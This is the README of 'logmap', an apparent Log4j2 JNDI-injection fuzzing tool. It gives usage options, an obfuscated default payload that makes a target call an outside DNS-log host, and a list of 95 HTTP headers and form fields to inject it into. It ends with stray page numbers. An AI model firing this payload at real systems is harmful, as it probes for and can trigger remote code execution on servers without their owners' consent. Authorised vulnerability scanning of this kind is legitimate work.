logmap - Log4j2 jndi injection fuzz tool
Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path
Use https://log.xn--9tr.com dnslog by default, If you want to use http://ceye.io, you need to modify the domain and token
Manually edit line #373 in logmap.py to modify:
args.ceye = ["xxxxxx.ceye.io", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]
to
args.ceye = ["1234567.ceye.io", "843fd6d58a8ebede756a2b991d321a5a"]
The default payload is ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//DNS_LOG_DOMAIN/a} You can customize at will, in line #283
This is just a jndi injection fuzz tool, rce or others need yourself
Use
[email protected]:~/$ pip3 install -r requirements.txt
[email protected]:~/$ python3 logmap.py -h
Options
-u URL, --url URL Target URL (e.g. http://example.com )
-f FILE, --file FILE Select a target list file (e.g. list.txt )
-d 1, --dns 1 Dnslog [1:log.xn--9tr.com, 2:ceye.io] default 1
-p PAYLOAD Custom payload (e.g. ${jndi:ldap://xx.dns.xx/} )
-t 10 Http timeout default 10s
--proxy PROXY Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)
-h, --help Show this help message and exit
Config
There are currently 95 fuzz headers
Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Ali-CDN-Real-IP
Authorization
Cache-Control
Cdn-Real-Ip
Cdn-Src-Ip
CF-Connecting-IP
Client-IP
Contact
Cookie
DNT
Fastly-Client-Ip
Forwarded-For-Ip
Forwarded-For
Forwarded
Forwarded-Proto
From
If-Modified-Since
Max-Forwards
Originating-Ip
Origin
Pragma
Proxy-Client-IP
Proxy
Referer
TE
True-Client-Ip
True-Client-IP
Upgrade
User-Agent
Via
Warning
WL-Proxy-Client-IP
X-Api-Version
X-Att-Deviceid
X-ATT-DeviceId
X-Client-IP
X-Client-Ip
X-Client-IP
X-Cluster-Client-IP
X-Correlation-ID
X-Csrf-Token
X-CSRFToken
X-Do-Not-Track
X-Foo-Bar
X-Foo
X-Forwarded-By
X-Forwarded-For-Original
X-Forwarded-For
X-Forwarded-Host
X-Forwarded
X-Forwarded-Port
X-Forwarded-Protocol
X-Forwarded-Proto
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Forward-For
X-Forward-Proto
X-Frame-Options
X-From
X-Geoip-Country
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method-Override
X-HTTP-Method-Override
X-Http-Method
X-Http-Path-Override
X-Https
X-Htx-Agent
X-Hub-Signature
X-If-Unmodified-Since
X-Imbo-Test-Config
X-Insight
X-Ip
X-Ip-Trail
X-Leakix
X-Original-URL
X-Originating-IP
X-ProxyUser-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-IP
X-Requested-With
X-Request-ID
X-True-IP
X-UIDH
X-Wap-Profile
X-WAP-Profile
X-XSRF-TOKEN
Some body and path
You can also modify him to add your own body
payload={}
user={}
pass={}
username={}
password={}
login={}
... ...
?id={}
?username={}
... ...
4 Jan 15, 2022
9.4k Jan 04, 2023
81 Dec 27, 2022
72 Jan 01, 2023
194 Jan 01, 2023
146 Jan 03, 2023
57 Nov 22, 2022
17 Nov 09, 2022
1 Nov 17, 2021
1 Dec 23, 2021
1 Jan 14, 2022
8 Mar 12, 2022
130 Dec 15, 2022
5 Apr 09, 2022
1 Dec 08, 2021
4 Jan 13, 2022
1 Nov 03, 2021
13 Jul 04, 2021
34 May 13, 2022
7 Sep 16, 2022